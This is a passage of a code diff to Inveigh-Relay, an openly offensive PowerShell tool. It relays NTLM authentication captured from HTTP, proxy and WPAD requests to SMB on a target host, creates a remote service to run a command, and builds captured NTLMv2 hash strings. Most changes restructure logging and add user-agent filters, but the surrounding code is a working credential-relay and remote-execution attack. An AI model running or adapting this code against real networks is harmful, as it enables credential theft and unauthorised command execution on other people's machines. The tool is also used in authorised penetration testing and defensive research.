Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'CheckAccess' } @@ -2232,11 +2385,20 @@ $SMB_relay_response_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")]) $SMB_service_manager_context_handle = $SMB_client_receive[108..127] $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") + } + if($SCM_data.Length -lt $SMB_split_index) { $SMB_client_stage = 'CreateServiceW' @@ -2250,8 +2412,18 @@ $SMB_relay_response_scriptblock = elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")]) $SMB_relay_failed = $true + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + } + } else { @@ -2274,9 +2446,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'StartServiceW' } @@ -2299,9 +2471,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) if($SMB_split_stage_final -le 2) { @@ -2333,9 +2505,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) if($SMB_split_stage -ge $SMB_split_stage_final) { @@ -2363,9 +2535,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'StartServiceW' } @@ -2375,8 +2547,21 @@ $SMB_relay_response_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00') { + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target") + $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target") + } + $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")]) + $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") $SMB_service_context_handle = $SMB_client_receive[112..131] $SMB2_message_ID += 20 $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID @@ -2392,19 +2577,27 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data - $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")]) - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'DeleteServiceW' } elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")]) $SMB_relay_failed = $true + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target") + } + } else { @@ -2419,12 +2612,32 @@ $SMB_relay_response_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00') { $inveigh.console_queue.Add("SMB relay command executed on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target") + } + } elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("SMB relay service $SMB_service failed to start on $Target") + } + } $SMB2_message_ID += 20 @@ -2441,9 +2654,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'CloseServiceHandle' $SMB_close_service_handle_stage = 1 @@ -2455,10 +2668,20 @@ $SMB_relay_response_scriptblock = if($SMB_close_service_handle_stage -eq 1) { $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")]) $SMB2_message_ID += 20 $SMB_close_service_handle_stage++ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target") + } + } else { @@ -2479,9 +2702,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) } 'CloseRequest' @@ -2495,9 +2718,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'TreeDisconnect' } @@ -2512,9 +2735,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'Logoff' } @@ -2529,9 +2752,9 @@ $SMB_relay_response_scriptblock = $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data - $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) $SMB_client_stream.Flush() - $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) $SMB_client_stage = 'Exit' } @@ -2540,8 +2763,18 @@ $SMB_relay_response_scriptblock = if($SMB_relay_failed) { $inveigh.console_queue.Add("SMB relay failed on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")]) $SMB_client_stage = 'Exit' + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target") + } + } } @@ -2550,9 +2783,19 @@ $SMB_relay_response_scriptblock = if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y') { - $inveigh.SMB_relay = $false $inveigh.console_queue.Add("SMB relay auto disabled due to success") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")]) + $inveigh.SMB_relay = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success") + } + } } @@ -2564,10 +2807,10 @@ $SMB_relay_response_scriptblock = } -# HTTP/HTTPS Server ScriptBlock +# HTTP/HTTPS/Proxy Server ScriptBlock $HTTP_scriptblock = { - param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADResponse) + param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADAuthIgnore,$WPADResponse) function NTLMChallengeBase64 { @@ -2640,6 +2883,8 @@ $HTTP_scriptblock = $HTTP_running = $true $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint + $HTTP_client_close = $true + $relay_step = 0 if($proxy_listener) { @@ -2654,23 +2899,35 @@ $HTTP_scriptblock = catch { $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")]) $HTTP_running = $false - } - $HTTP_client_close = $true - $relay_step = 0 + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") + } + + } :HTTP_listener_loop while($inveigh.relay_running -and $HTTP_running) { $TCP_request = "" $TCP_request_bytes = New-Object System.Byte[] 4096 + $HTTP_send = $true $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html") $HTTP_header_cache_control = "" $HTTP_header_authenticate = "" $HTTP_header_authenticate_data = "" $HTTP_message = "" $HTTP_header_authorization = "" + $HTTP_header_host = "" + $HTTP_header_user_agent = "" + $HTTP_request_raw_URL = "" + $NTLM = "NTLM" while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) { @@ -2690,9 +2947,19 @@ $HTTP_scriptblock = if($relay_reset -gt 2) { $inveigh.console_queue.Add("SMB relay attack resetting") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")]) $SMB_relay_socket.Close() $relay_step = 0 + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay attack resetting") + } + } } @@ -2745,6 +3012,61 @@ $HTTP_scriptblock = $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) + $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + + if($TCP_request -like "*-48-6F-73-74-3A-20-*") + { + $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19) + $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-")) + $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length) + } + + if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*") + { + $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-")) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length) + } + + if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") + } + + if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + } + + } + + } if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") { @@ -2754,10 +3076,12 @@ $HTTP_scriptblock = $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length) } - if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')) + if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or ( + $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) { $HTTP_response_status_code = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b + $HTTP_client_close = $true } else { @@ -2774,71 +3098,34 @@ $HTTP_scriptblock = } $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 - } - - $NTLM = "NTLM" - $NTLM_auth = $false - $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString - - if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")]) - - if($TCP_request -like "*-48-6F-73-74-3A-20-*") - { - $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 18) - $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-")) - $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length) - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")]) - } - - if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*") - { - $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36) - $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-")) - $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length) - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")]) - - if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")]) - } - - } - + $HTTP_client_close = $false } if($HTTP_header_authorization.StartsWith('NTLM ')) { $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ','' [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization) - - if($proxy_listener) - { - $HTTP_response_status_code = 0x34,0x30,0x37 - $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 - } - else - { - $HTTP_response_status_code = 0x34,0x30,0x31 - $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 - } if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') { if($inveigh.SMB_relay -and $HTTP_source_IP -ne $Target -and $relay_step -eq 0) { + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target) + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP") + $inveigh.log.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target) + } + $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by $HTTP_source_IP at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")]) $inveigh.console_queue.Add("Grabbing challenge for relay from $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)]) $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient $SMB_relay_socket.Client.ReceiveTimeout = 60000 $SMB_relay_socket.Connect($Target,"445") @@ -2848,8 +3135,18 @@ $HTTP_scriptblock = if(!$SMB_relay_socket.connected) { $inveigh.console_queue.Add("SMB relay target is not responding") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")]) $relay_step = 0 + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB relay target is not responding") + } + } if($relay_step -eq 1) @@ -2900,10 +3197,21 @@ $HTTP_scriptblock = $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")]) - $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $HTTP_source_IP)]) + $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") $relay_step = 2 + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target") + $inveigh.log.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") + } + } else { @@ -2919,7 +3227,6 @@ $HTTP_scriptblock = } elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') { - $NTLM = 'NTLM' $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes @@ -2961,9 +3268,18 @@ $HTTP_scriptblock = $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + 